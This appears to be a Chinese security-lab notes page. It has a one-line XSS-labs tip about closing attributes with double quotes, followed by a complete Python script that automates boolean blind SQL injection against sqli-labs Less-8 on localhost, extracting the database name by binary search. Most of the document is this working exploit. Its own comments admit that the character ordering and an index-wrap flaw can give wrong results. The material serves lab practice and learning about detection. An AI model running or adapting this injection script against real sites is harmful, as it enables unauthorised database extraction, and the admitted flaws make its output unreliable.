Xss-labs 1-8
- 发现>、<都被过滤掉了,但是没有将预定义字符转义,需要用双引号进行属性闭合。
使用二分查找进行python实现自动化布尔盲注(sqli8)
import requests
# Lab target: sqli-labs Less-8 on a local instance (the lab's "id" parameter is the injection point)
url = "http://127.0.0.1/sqli/Less-8/index.php"
# Placeholder for the inferred database name (the functions below return their own result instead)
database_name = ""
# Candidate characters probed per position; the binary search below relies on this order,
# which does not match MySQL's default case-insensitive collation, so results may be off for letters
charset = (
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789"
    "_-. "
)
# 推断数据库名的长度
def get_database_length():
    """Infer the length of the current database name from the lab's boolean oracle.

    Sends one request per candidate length (1..51) and treats the page text
    "You are in..........." as the TRUE signal.

    Returns:
        The first length for which the oracle answered TRUE, or 0 when none of
        the 51 candidates matched.

    Detection note: this produces a burst of requests to the same URL whose
    "id" value contains SQL syntax (`' AND (SELECT ...) -- `), a pattern that
    is easy to spot in access logs or a WAF.
    """
    truth_marker = "You are in..........."
    # 51 probes in total: the original loop still issued the request for
    # length 51 before its safety cut-off stopped it.
    for candidate in range(1, 52):
        probe = f"1' AND (SELECT length(database()) = {candidate}) -- "
        page = requests.get(url, params={"id": probe}).text
        if truth_marker in page:
            return candidate
    return 0
# 推断数据库名
def get_database_name(length):
    """Recover the database name character by character via the boolean oracle.

    For each position 1..length, binary-searches `charset` using a
    `substring(database(), i, 1) >= '<char>'` comparison; the presence of
    "You are in" in the response is taken as TRUE.

    Args:
        length: number of characters to recover (normally the value returned by
            get_database_length()).

    Returns:
        The recovered string. Caveat: when no character in `charset` satisfies
        the comparison the search ends with an index of -1, which Python wraps
        to the last charset entry (a space), so such positions are unreliable.

    Detection note: roughly log2(len(charset)) requests per character, all to
    the same endpoint with a varying SQL fragment in "id".
    """
    truth_marker = "You are in"
    recovered = []
    for position in range(1, length + 1):
        lo, hi = 0, len(charset) - 1
        while lo <= hi:
            mid = (lo + hi) // 2
            probe = (
                f"1' AND (SELECT substring(database(), {position}, 1) "
                f">= '{charset[mid]}') -- "
            )
            page = requests.get(url, params={"id": probe}).text
            if truth_marker in page:
                lo = mid + 1
            else:
                hi = mid - 1
        # `hi` now indexes the largest charset entry the oracle accepted.
        recovered.append(charset[hi])
    return "".join(recovered)
# 主函数
if __name__ == "__main__":
    # Entry point: first the length, then the name, mirroring the two oracles above.
    db_length = get_database_length()
    if not db_length:
        print("Failed to determine database length.")
    else:
        print(f"Database length: {db_length}")
        print(f"Database name: {get_database_name(db_length)}")